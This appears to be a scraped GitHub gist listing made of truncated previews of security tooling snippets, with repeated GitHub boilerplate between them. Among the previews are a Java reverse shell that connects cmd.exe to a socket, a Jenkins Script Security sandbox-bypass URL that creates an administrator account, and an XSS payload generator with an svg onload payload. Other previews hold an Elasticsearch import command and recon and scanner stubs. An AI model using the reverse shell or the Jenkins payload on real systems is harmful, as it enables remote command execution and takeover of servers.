elasticdump \
--input="./output.json" \
--output="http://127.0.0.1:9200" \
--output-index="subfinder" \
--limit=10000 \
--type=data \
--transform="doc._source=Object.assign({},doc)"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
Usage: | |
go get github.com/Ice3man543/subfinder | |
go get github.com/gin-gonic/gin | |
go get github.com/jinzhu/gorm | |
go get github.com/mattn/go-sqlite3 | |
go run api.go |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
String host="localhost"; | |
int port=8044; | |
String cmd="cmd.exe"; | |
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ipaddress | |
import fileinput | |
ips = [] | |
for line in fileinput.input(): | |
try: | |
ips.extend(list(ipaddress.ip_network(line.strip()))) | |
except: | |
pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
function bindEvent(element, eventName, eventHandler) { | |
if (element.addEventListener){ | |
element.addEventListener(eventName, eventHandler, false); | |
} else if (element.attachEvent) { | |
element.attachEvent('on' + eventName, eventHandler); | |
} | |
} | |
bindEvent(window, 'message', function (e) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def payload_generator(context): | |
payloads = [] | |
if context == 'attribname': | |
payloads = [] | |
comb = {} | |
# check for escaping < > | |
comb['payload'] = "\"><svg onload=prompt`812132`>" | |
comb['find'] = "//svg[@onload[contains(.,812132)]]" | |
payloads.append(comb) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lxml import html | |
import re | |
class ContextAnalyzer: | |
def __init__(self, response_text, search_string): | |
self.get_contexts(response_text, search_string) | |
@staticmethod |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import logging | |
from concurrent.futures import ThreadPoolExecutor | |
import asyncio | |
from urllib3.exceptions import InsecureRequestWarning | |
# Suppress only the single warning from urllib3 needed. | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from mainAPI.models import Organization, OrganizationMember, User, Asset, Bug, CWE, CVE, Package, Mobile, Web, Code, Port, Cloud, Endpoint, Network, AssetHealth, Team, Permissions | |
import numpy as np | |
import random | |
import pandas as pd | |
import os | |
class Dummy: | |
def __init__(self): | |
self.create_organization() |
OlderNewer